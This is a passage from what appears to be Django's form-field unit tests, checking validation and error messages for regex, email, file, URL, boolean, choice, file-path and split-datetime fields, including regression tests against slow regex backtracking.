self.assertEqual('3F3', f.clean('3F3'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '3G3')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, ' 2A2')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '2A2 ')
def test_regexfield_4(self):
f = RegexField('^\d\d\d\d$', error_message='Enter a four-digit number.')
self.assertEqual('1234', f.clean('1234'))
self.assertRaisesMessage(ValidationError, "'Enter a four-digit number.'", f.clean, '123')
self.assertRaisesMessage(ValidationError, "'Enter a four-digit number.'", f.clean, 'abcd')
def test_regexfield_5(self):
f = RegexField('^\d+$', min_length=5, max_length=10)
self.assertRaisesMessage(ValidationError, "'Ensure this value has at least 5 characters (it has 3).'", f.clean, '123')
six.assertRaisesRegex(self, ValidationError, "'Ensure this value has at least 5 characters \(it has 3\)\.', u?'Enter a valid value\.'", f.clean, 'abc')
self.assertEqual('12345', f.clean('12345'))
self.assertEqual('1234567890', f.clean('1234567890'))
self.assertRaisesMessage(ValidationError, "'Ensure this value has at most 10 characters (it has 11).'", f.clean, '12345678901')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '12345a')
def test_regexfield_6(self):
"""
Ensure that it works with unicode characters.
Refs #.
"""
f = RegexField('^\w+$')
self.assertEqual('éèøçÎÎ你好', f.clean('éèøçÎÎ你好'))
def test_change_regex_after_init(self):
f = RegexField('^[a-z]+$')
f.regex = '^\d+$'
self.assertEqual('1234', f.clean('1234'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, 'abcd')
# EmailField ##################################################################
# See also validators tests for validate_email specific tests
def test_emailfield_1(self):
f = EmailField()
self.assertWidgetRendersTo(f, '<input type="email" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual('person@example.com', f.clean('person@example.com'))
self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'foo')
self.assertEqual('local@domain.with.idn.xyz\xe4\xf6\xfc\xdfabc.part.com',
f.clean('local@domain.with.idn.xyzäöüßabc.part.com'))
def test_email_regexp_for_performance(self):
f = EmailField()
# Check for runaway regex security problem. This will take for-freeking-ever
# if the security fix isn't in place.
addr = 'viewx3dtextx26qx3d@yahoo.comx26latlngx3d15854521645943074058'
self.assertEqual(addr, f.clean(addr))
def test_emailfield_not_required(self):
f = EmailField(required=False)
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
self.assertEqual('person@example.com', f.clean('person@example.com'))
self.assertEqual('example@example.com', f.clean(' example@example.com \t \t '))
self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'foo')
def test_emailfield_min_max_length(self):
f = EmailField(min_length=10, max_length=15)
self.assertWidgetRendersTo(f, '<input id="id_f" type="email" name="f" maxlength="15" />')
self.assertRaisesMessage(ValidationError, "'Ensure this value has at least 10 characters (it has 9).'", f.clean, 'a@foo.com')
self.assertEqual('alf@foo.com', f.clean('alf@foo.com'))
self.assertRaisesMessage(ValidationError, "'Ensure this value has at most 15 characters (it has 20).'", f.clean, 'alf123456788@foo.com')
# FileField ##################################################################
def test_filefield_1(self):
f = FileField()
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '', '')
self.assertEqual('files/test1.pdf', f.clean('', 'files/test1.pdf'))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None, '')
self.assertEqual('files/test2.pdf', f.clean(None, 'files/test2.pdf'))
self.assertRaisesMessage(ValidationError, "'No file was submitted. Check the encoding type on the form.'", f.clean, SimpleUploadedFile('', b''))
self.assertRaisesMessage(ValidationError, "'No file was submitted. Check the encoding type on the form.'", f.clean, SimpleUploadedFile('', b''), '')
self.assertEqual('files/test3.pdf', f.clean(None, 'files/test3.pdf'))
self.assertRaisesMessage(ValidationError, "'No file was submitted. Check the encoding type on the form.'", f.clean, 'some content that is not a file')
self.assertRaisesMessage(ValidationError, "'The submitted file is empty.'", f.clean, SimpleUploadedFile('name', None))
self.assertRaisesMessage(ValidationError, "'The submitted file is empty.'", f.clean, SimpleUploadedFile('name', b''))
self.assertEqual(SimpleUploadedFile, type(f.clean(SimpleUploadedFile('name', b'Some File Content'))))
self.assertEqual(SimpleUploadedFile, type(f.clean(SimpleUploadedFile('我隻氣墊船裝滿晒鱔.txt', 'मेरी मँडराने वाली नाव सर्पमीनों से भरी ह'.encode('utf-8')))))
self.assertEqual(SimpleUploadedFile, type(f.clean(SimpleUploadedFile('name', b'Some File Content'), 'files/test4.pdf')))
def test_filefield_2(self):
f = FileField(max_length = 5)
self.assertRaisesMessage(ValidationError, "'Ensure this filename has at most 5 characters (it has 18).'", f.clean, SimpleUploadedFile('test_maxlength.txt', b'hello world'))
self.assertEqual('files/test1.pdf', f.clean('', 'files/test1.pdf'))
self.assertEqual('files/test2.pdf', f.clean(None, 'files/test2.pdf'))
self.assertEqual(SimpleUploadedFile, type(f.clean(SimpleUploadedFile('name', b'Some File Content'))))
def test_filefield_3(self):
f = FileField(allow_empty_file=True)
self.assertEqual(SimpleUploadedFile,
type(f.clean(SimpleUploadedFile('name', b''))))
def test_filefield_changed(self):
'''
Test for the behavior of _has_changed for FileField. The value of data will
more than likely come from request.FILES. The value of initial data will
likely be a filename stored in the database. Since its value is of no use to
a FileField it is ignored.
'''
f = FileField()
# No file was uploaded and no initial data.
self.assertFalse(f._has_changed('', None))
# A file was uploaded and no initial data.
self.assertTrue(f._has_changed('', {'filename': 'resume.txt', 'content': 'My resume'}))
# A file was not uploaded, but there is initial data
self.assertFalse(f._has_changed('resume.txt', None))
# A file was uploaded and there is initial data (file identity is not dealt
# with here)
self.assertTrue(f._has_changed('resume.txt', {'filename': 'resume.txt', 'content': 'My resume'}))
# URLField ##################################################################
def test_urlfield_1(self):
f = URLField()
self.assertWidgetRendersTo(f, '<input type="url" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual('http://localhost/', f.clean('http://localhost'))
self.assertEqual('http://example.com/', f.clean('http://example.com'))
self.assertEqual('http://example.com./', f.clean('http://example.com.'))
self.assertEqual('http://www.example.com/', f.clean('http://www.example.com'))
self.assertEqual('http://www.example.com:8000/test', f.clean('http://www.example.com:8000/test'))
self.assertEqual('http://valid-with-hyphens.com/', f.clean('valid-with-hyphens.com'))
self.assertEqual('http://subdomain.domain.com/', f.clean('subdomain.domain.com'))
self.assertEqual('http://200.8.9.10/', f.clean('http://200.8.9.10'))
self.assertEqual('http://200.8.9.10:8000/test', f.clean('http://200.8.9.10:8000/test'))
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'com.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, '.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://invalid-.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://-invalid.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://inv-.alid-.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://inv-.-alid.com')
self.assertEqual('http://valid-----hyphens.com/', f.clean('http://valid-----hyphens.com'))
self.assertEqual('http://some.idn.xyz\xe4\xf6\xfc\xdfabc.domain.com:123/blah', f.clean('http://some.idn.xyzäöüßabc.domain.com:123/blah'))
self.assertEqual('http://www.example.com/s/http://code.djangoproject.com/ticket/13804', f.clean('www.example.com/s/http://code.djangoproject.com/ticket/13804'))
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, '[a')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://[a')
def test_url_regex_ticket11198(self):
f = URLField()
# hangs "forever" if catastrophic backtracking in ticket:#11198 not fixed
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://%s' % ("X"*200,))
# a second test, to make sure the problem is really addressed, even on
# domains that don't fail the domain label length check in the regex
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://%s' % ("X"*60,))
def test_urlfield_2(self):
f = URLField(required=False)
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
self.assertEqual('http://example.com/', f.clean('http://example.com'))
self.assertEqual('http://www.example.com/', f.clean('http://www.example.com'))
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://.com')
def test_urlfield_5(self):
f = URLField(min_length=15, max_length=20)
self.assertWidgetRendersTo(f, '<input id="id_f" type="url" name="f" maxlength="20" />')
self.assertRaisesMessage(ValidationError, "'Ensure this value has at least 15 characters (it has 13).'", f.clean, 'http://f.com')
self.assertEqual('http://example.com/', f.clean('http://example.com'))
self.assertRaisesMessage(ValidationError, "'Ensure this value has at most 20 characters (it has 38).'", f.clean, 'http://abcdefghijklmnopqrstuvwxyz.com')
def test_urlfield_6(self):
f = URLField(required=False)
self.assertEqual('http://example.com/', f.clean('example.com'))
self.assertEqual('', f.clean(''))
self.assertEqual('https://example.com/', f.clean('https://example.com'))
def test_urlfield_7(self):
f = URLField()
self.assertEqual('http://example.com/', f.clean('http://example.com'))
self.assertEqual('http://example.com/test', f.clean('http://example.com/test'))
def test_urlfield_8(self):
# ticket #11826
f = URLField()
self.assertEqual('http://example.com/?some_param=some_value', f.clean('http://example.com?some_param=some_value'))
def test_urlfield_9(self):
f = URLField()
urls = (
'http://עברית.idn.icann.org/',
'http://sãopaulo.com/',
'http://sãopaulo.com.br/',
'http://пример.испытание/',
'http://مثال.إختبار/',
'http://例子.测试/',
'http://例子.測試/',
'http://उदाहरण.परीक्षा/',
'http://例え.テスト/',
'http://مثال.آزمایشی/',
'http://실례.테스트/',
'http://العربية.idn.icann.org/',
)
for url in urls:
# Valid IDN
self.assertEqual(url, f.clean(url))
def test_urlfield_10(self):
"""Test URLField correctly validates IPv6 (#18779)."""
f = URLField()
urls = (
'http://::/',
'http://6:21b4:92/',
'http://[12:34:3a53]/',
'http://[a34:9238::]:8080/',
)
for url in urls:
self.assertEqual(url, f.clean(url))
def test_urlfield_not_string(self):
f = URLField(required=False)
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 23)
# BooleanField ################################################################
def test_booleanfield_1(self):
f = BooleanField()
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(True, f.clean(True))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, False)
self.assertEqual(True, f.clean(1))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, 0)
self.assertEqual(True, f.clean('Django rocks'))
self.assertEqual(True, f.clean('True'))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, 'False')
def test_booleanfield_2(self):
f = BooleanField(required=False)
self.assertEqual(False, f.clean(''))
self.assertEqual(False, f.clean(None))
self.assertEqual(True, f.clean(True))
self.assertEqual(False, f.clean(False))
self.assertEqual(True, f.clean(1))
self.assertEqual(False, f.clean(0))
self.assertEqual(True, f.clean('1'))
self.assertEqual(False, f.clean('0'))
self.assertEqual(True, f.clean('Django rocks'))
self.assertEqual(False, f.clean('False'))
self.assertEqual(False, f.clean('false'))
self.assertEqual(False, f.clean('FaLsE'))
def test_boolean_picklable(self):
self.assertIsInstance(pickle.loads(pickle.dumps(BooleanField())), BooleanField)
def test_booleanfield_changed(self):
f = BooleanField()
self.assertFalse(f._has_changed(None, None))
self.assertFalse(f._has_changed(None, ''))
self.assertFalse(f._has_changed('', None))
self.assertFalse(f._has_changed('', ''))
self.assertTrue(f._has_changed(False, 'on'))
self.assertFalse(f._has_changed(True, 'on'))
self.assertTrue(f._has_changed(True, ''))
# Initial value may have mutated to a string due to show_hidden_initial (#19537)
self.assertTrue(f._has_changed('False', 'on'))
# ChoiceField #################################################################
def test_choicefield_1(self):
f = ChoiceField(choices=[('1', 'One'), ('2', 'Two')])
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual('1', f.clean(1))
self.assertEqual('1', f.clean('1'))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 3 is not one of the available choices.'", f.clean, '3')
def test_choicefield_2(self):
f = ChoiceField(choices=[('1', 'One'), ('2', 'Two')], required=False)
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
self.assertEqual('1', f.clean(1))
self.assertEqual('1', f.clean('1'))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 3 is not one of the available choices.'", f.clean, '3')
def test_choicefield_3(self):
f = ChoiceField(choices=[('J', 'John'), ('P', 'Paul')])
self.assertEqual('J', f.clean('J'))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. John is not one of the available choices.'", f.clean, 'John')
def test_choicefield_4(self):
f = ChoiceField(choices=[('Numbers', (('1', 'One'), ('2', 'Two'))), ('Letters', (('3','A'),('4','B'))), ('5','Other')])
self.assertEqual('1', f.clean(1))
self.assertEqual('1', f.clean('1'))
self.assertEqual('3', f.clean(3))
self.assertEqual('3', f.clean('3'))
self.assertEqual('5', f.clean(5))
self.assertEqual('5', f.clean('5'))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 6 is not one of the available choices.'", f.clean, '6')
# TypedChoiceField ############################################################
# TypedChoiceField is just like ChoiceField, except that coerced types will
# be returned:
def test_typedchoicefield_1(self):
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int)
self.assertEqual(1, f.clean('1'))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 2 is not one of the available choices.'", f.clean, '2')
def test_typedchoicefield_2(self):
# Different coercion, same validation.
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=float)
self.assertEqual(1.0, f.clean('1'))
def test_typedchoicefield_3(self):
# This can also cause weirdness: be careful (bool(-1) == True, remember)
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=bool)
self.assertEqual(True, f.clean('-1'))
def test_typedchoicefield_4(self):
# Even more weirdness: if you have a valid choice but your coercion function
# can't coerce, yo'll still get a validation error. Don't do this!
f = TypedChoiceField(choices=[('A', 'A'), ('B', 'B')], coerce=int)
self.assertRaisesMessage(ValidationError, "'Select a valid choice. B is not one of the available choices.'", f.clean, 'B')
# Required fields require values
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
def test_typedchoicefield_5(self):
# Non-required fields aren't required
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False)
self.assertEqual('', f.clean(''))
# If you want cleaning an empty value to return a different type, tell the field
def test_typedchoicefield_6(self):
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False, empty_value=None)
self.assertEqual(None, f.clean(''))
def test_typedchoicefield_has_changed(self):
# has_changed should not trigger required validation
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=True)
self.assertFalse(f._has_changed(None, ''))
# NullBooleanField ############################################################
def test_nullbooleanfield_1(self):
f = NullBooleanField()
self.assertEqual(None, f.clean(''))
self.assertEqual(True, f.clean(True))
self.assertEqual(False, f.clean(False))
self.assertEqual(None, f.clean(None))
self.assertEqual(False, f.clean('0'))
self.assertEqual(True, f.clean('1'))
self.assertEqual(None, f.clean('2'))
self.assertEqual(None, f.clean('3'))
self.assertEqual(None, f.clean('hello'))
def test_nullbooleanfield_2(self):
# Make sure that the internal value is preserved if using HiddenInput (#7753)
class HiddenNullBooleanForm(Form):
hidden_nullbool1 = NullBooleanField(widget=HiddenInput, initial=True)
hidden_nullbool2 = NullBooleanField(widget=HiddenInput, initial=False)
f = HiddenNullBooleanForm()
self.assertHTMLEqual('<input type="hidden" name="hidden_nullbool1" value="True" id="id_hidden_nullbool1" /><input type="hidden" name="hidden_nullbool2" value="False" id="id_hidden_nullbool2" />', str(f))
def test_nullbooleanfield_3(self):
class HiddenNullBooleanForm(Form):
hidden_nullbool1 = NullBooleanField(widget=HiddenInput, initial=True)
hidden_nullbool2 = NullBooleanField(widget=HiddenInput, initial=False)
f = HiddenNullBooleanForm({ 'hidden_nullbool1': 'True', 'hidden_nullbool2': 'False' })
self.assertEqual(None, f.full_clean())
self.assertEqual(True, f.cleaned_data['hidden_nullbool1'])
self.assertEqual(False, f.cleaned_data['hidden_nullbool2'])
def test_nullbooleanfield_4(self):
# Make sure we're compatible with MySQL, which uses 0 and 1 for its boolean
# values. (#9609)
NULLBOOL_CHOICES = (('1', 'Yes'), ('0', 'No'), ('', 'Unknown'))
class MySQLNullBooleanForm(Form):
nullbool0 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
nullbool1 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
nullbool2 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
f = MySQLNullBooleanForm({ 'nullbool0': '1', 'nullbool1': '0', 'nullbool2': '' })
self.assertEqual(None, f.full_clean())
self.assertEqual(True, f.cleaned_data['nullbool0'])
self.assertEqual(False, f.cleaned_data['nullbool1'])
self.assertEqual(None, f.cleaned_data['nullbool2'])
def test_nullbooleanfield_changed(self):
f = NullBooleanField()
self.assertTrue(f._has_changed(False, None))
self.assertTrue(f._has_changed(None, False))
self.assertFalse(f._has_changed(None, None))
self.assertFalse(f._has_changed(False, False))
self.assertTrue(f._has_changed(True, False))
self.assertTrue(f._has_changed(True, None))
self.assertTrue(f._has_changed(True, False))
# MultipleChoiceField #########################################################
def test_multiplechoicefield_1(self):
f = MultipleChoiceField(choices=[('1', 'One'), ('2', 'Two')])
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(['1'], f.clean([1]))
self.assertEqual(['1'], f.clean(['1']))
self.assertEqual(['1', '2'], f.clean(['1', '2']))
self.assertEqual(['1', '2'], f.clean([1, '2']))
self.assertEqual(['1', '2'], f.clean((1, '2')))
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, [])
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, ())
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 3 is not one of the available choices.'", f.clean, ['3'])
def test_multiplechoicefield_2(self):
f = MultipleChoiceField(choices=[('1', 'One'), ('2', 'Two')], required=False)
self.assertEqual([], f.clean(''))
self.assertEqual([], f.clean(None))
self.assertEqual(['1'], f.clean([1]))
self.assertEqual(['1'], f.clean(['1']))
self.assertEqual(['1', '2'], f.clean(['1', '2']))
self.assertEqual(['1', '2'], f.clean([1, '2']))
self.assertEqual(['1', '2'], f.clean((1, '2')))
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
self.assertEqual([], f.clean([]))
self.assertEqual([], f.clean(()))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 3 is not one of the available choices.'", f.clean, ['3'])
def test_multiplechoicefield_3(self):
f = MultipleChoiceField(choices=[('Numbers', (('1', 'One'), ('2', 'Two'))), ('Letters', (('3','A'),('4','B'))), ('5','Other')])
self.assertEqual(['1'], f.clean([1]))
self.assertEqual(['1'], f.clean(['1']))
self.assertEqual(['1', '5'], f.clean([1, 5]))
self.assertEqual(['1', '5'], f.clean([1, '5']))
self.assertEqual(['1', '5'], f.clean(['1', 5]))
self.assertEqual(['1', '5'], f.clean(['1', '5']))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 6 is not one of the available choices.'", f.clean, ['6'])
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 6 is not one of the available choices.'", f.clean, ['1','6'])
def test_multiplechoicefield_changed(self):
f = MultipleChoiceField(choices=[('1', 'One'), ('2', 'Two'), ('3', 'Three')])
self.assertFalse(f._has_changed(None, None))
self.assertFalse(f._has_changed([], None))
self.assertTrue(f._has_changed(None, ['1']))
self.assertFalse(f._has_changed([1, 2], ['1', '2']))
self.assertFalse(f._has_changed([2, 1], ['1', '2']))
self.assertTrue(f._has_changed([1, 2], ['1']))
self.assertTrue(f._has_changed([1, 2], ['1', '3']))
# TypedMultipleChoiceField ############################################################
# TypedMultipleChoiceField is just like MultipleChoiceField, except that coerced types
# will be returned:
def test_typedmultiplechoicefield_1(self):
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int)
self.assertEqual([1], f.clean(['1']))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 2 is not one of the available choices.'", f.clean, ['2'])
def test_typedmultiplechoicefield_2(self):
# Different coercion, same validation.
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=float)
self.assertEqual([1.0], f.clean(['1']))
def test_typedmultiplechoicefield_3(self):
# This can also cause weirdness: be careful (bool(-1) == True, remember)
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=bool)
self.assertEqual([True], f.clean(['-1']))
def test_typedmultiplechoicefield_4(self):
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int)
self.assertEqual([1, -1], f.clean(['1','-1']))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 2 is not one of the available choices.'", f.clean, ['1','2'])
def test_typedmultiplechoicefield_5(self):
# Even more weirdness: if you have a valid choice but your coercion function
# can't coerce, you'll still get a validation error. Don't do this!
f = TypedMultipleChoiceField(choices=[('A', 'A'), ('B', 'B')], coerce=int)
self.assertRaisesMessage(ValidationError, "'Select a valid choice. B is not one of the available choices.'", f.clean, ['B'])
# Required fields require values
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, [])
def test_typedmultiplechoicefield_6(self):
# Non-required fields aren't required
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False)
self.assertEqual([], f.clean([]))
def test_typedmultiplechoicefield_7(self):
# If you want cleaning an empty value to return a different type, tell the field
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False, empty_value=None)
self.assertEqual(None, f.clean([]))
def test_typedmultiplechoicefield_has_changed(self):
# has_changed should not trigger required validation
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=True)
self.assertFalse(f._has_changed(None, ''))
# ComboField ##################################################################
def test_combofield_1(self):
f = ComboField(fields=[CharField(max_length=20), EmailField()])
self.assertEqual('test@example.com', f.clean('test@example.com'))
self.assertRaisesMessage(ValidationError, "'Ensure this value has at most 20 characters (it has 28).'", f.clean, 'longemailaddress@example.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'not an email')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
def test_combofield_2(self):
f = ComboField(fields=[CharField(max_length=20), EmailField()], required=False)
self.assertEqual('test@example.com', f.clean('test@example.com'))
self.assertRaisesMessage(ValidationError, "'Ensure this value has at most 20 characters (it has 28).'", f.clean, 'longemailaddress@example.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'not an email')
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
# FilePathField ###############################################################
def test_filepathfield_1(self):
path = os.path.abspath(upath(forms.__file__))
path = os.path.dirname(path) + '/'
self.assertTrue(fix_os_paths(path).endswith('/django/forms/'))
def test_filepathfield_2(self):
path = upath(forms.__file__)
path = os.path.dirname(os.path.abspath(path)) + '/'
f = FilePathField(path=path)
f.choices = [p for p in f.choices if p[0].endswith('.py')]
f.choices.sort()
expected = [
('/django/forms/__init__.py', '__init__.py'),
('/django/forms/fields.py', 'fields.py'),
('/django/forms/forms.py', 'forms.py'),
('/django/forms/formsets.py', 'formsets.py'),
('/django/forms/models.py', 'models.py'),
('/django/forms/util.py', 'util.py'),
('/django/forms/widgets.py', 'widgets.py')
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. fields.py is not one of the available choices.'", f.clean, 'fields.py')
assert fix_os_paths(f.clean(path + 'fields.py')).endswith('/django/forms/fields.py')
def test_filepathfield_3(self):
path = upath(forms.__file__)
path = os.path.dirname(os.path.abspath(path)) + '/'
f = FilePathField(path=path, match='^.*?\.py$')
f.choices.sort()
expected = [
('/django/forms/__init__.py', '__init__.py'),
('/django/forms/fields.py', 'fields.py'),
('/django/forms/forms.py', 'forms.py'),
('/django/forms/formsets.py', 'formsets.py'),
('/django/forms/models.py', 'models.py'),
('/django/forms/util.py', 'util.py'),
('/django/forms/widgets.py', 'widgets.py')
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
def test_filepathfield_4(self):
path = os.path.abspath(upath(forms.__file__))
path = os.path.dirname(path) + '/'
f = FilePathField(path=path, recursive=True, match='^.*?\.py$')
f.choices.sort()
expected = [
('/django/forms/__init__.py', '__init__.py'),
('/django/forms/extras/__init__.py', 'extras/__init__.py'),
('/django/forms/extras/widgets.py', 'extras/widgets.py'),
('/django/forms/fields.py', 'fields.py'),
('/django/forms/forms.py', 'forms.py'),
('/django/forms/formsets.py', 'formsets.py'),
('/django/forms/models.py', 'models.py'),
('/django/forms/util.py', 'util.py'),
('/django/forms/widgets.py', 'widgets.py')
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
def test_filepathfield_folders(self):
path = os.path.dirname(upath(__file__)) + '/filepath_test_files/'
f = FilePathField(path=path, allow_folders=True, allow_files=False)
f.choices.sort()
expected = [
('/tests/forms_tests/tests/filepath_test_files/directory', 'directory'),
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
f = FilePathField(path=path, allow_folders=True, allow_files=True)
f.choices.sort()
expected = [
('/tests/forms_tests/tests/filepath_test_files/.dot-file', '.dot-file'),
('/tests/forms_tests/tests/filepath_test_files/directory', 'directory'),
('/tests/forms_tests/tests/filepath_test_files/fake-image.jpg', 'fake-image.jpg'),
('/tests/forms_tests/tests/filepath_test_files/real-text-file.txt', 'real-text-file.txt'),
]
actual = fix_os_paths(f.choices)
self.assertEqual(len(expected), len(actual))
for exp, got in zip(expected, actual):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
# SplitDateTimeField ##########################################################
def test_splitdatetimefield_1(self):
from django.forms.widgets import SplitDateTimeWidget
f = SplitDateTimeField()
assert isinstance(f.widget, SplitDateTimeWidget)
self.assertEqual(datetime.datetime(2006, 1, 10, 7, 30), f.clean([datetime.date(2006, 1, 10), datetime.time(7, 30)]))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
six.assertRaisesRegex(self, ValidationError, "'Enter a valid date\.', u?'Enter a valid time\.'", f.clean, ['hello', 'there'])
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10', 'there'])
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ['hello', '07:30'])
def test_splitdatetimefield_2(self):
f = SplitDateTimeField(required=False)
self.assertEqual(datetime.datetime(2006, 1, 10, 7, 30), f.clean([datetime.date(2006, 1, 10), datetime.time(7, 30)]))
self.assertEqual(datetime.datetime(2006, 1, 10, 7, 30), f.clean(['2006-01-10', '07:30']))
self.assertEqual(None, f.clean(None))
self.assertEqual(None, f.clean(''))
self.assertEqual(None, f.clean(['']))
self.assertEqual(None, f.clean(['', '']))
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
six.assertRaisesRegex(self, ValidationError, "'Enter a valid date\.', u?'Enter a valid time\.'", f.clean, ['hello', 'there'])
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10', 'there'])
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ['hello', '07:30'])
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10', ''])
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10'])
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ['', '07:30'])
def test_splitdatetimefield_changed(self):
f = SplitDateTimeField(input_date_formats=['%d/%m/%Y'])
